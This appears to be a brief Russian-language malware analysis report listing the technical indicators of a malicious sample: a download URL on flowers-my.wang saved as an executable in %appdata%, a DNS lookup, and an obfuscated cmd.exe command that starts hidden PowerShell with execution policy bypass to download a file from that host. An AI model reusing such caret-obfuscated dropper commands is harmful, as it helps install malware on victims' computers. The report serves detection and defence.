Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^ow^e^R^S^helL.ExE -EX^ECu^Ti^O^nPOl^i^cY^ b^y^Pa^s^s -N^o^PR^o^f^I^le -^wIn^Do^wstyL^e H^IDdEN^ (nE^w-o^B^J^eCT S^YsT^em.N^et.W^Ebc^L^IE^N^T).^doW^n^LoADFI^L^E(^'http://flowe...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "p^ow^e^R^S^helL.ExE -EX^ECu^Ti^O^nPOl^i^cY^ b^y^Pa^s^s -N^o^PR^o^f^I^le -^wIn^Do^wstyL^e H^IDdEN^ (nE^w-o^B^J^eCT S^YsT^em.N^et.W^Ebc^L^IE^N^T).^doW^n^LoADFI^L^E(^'http://flowe...' (со скрытым окном)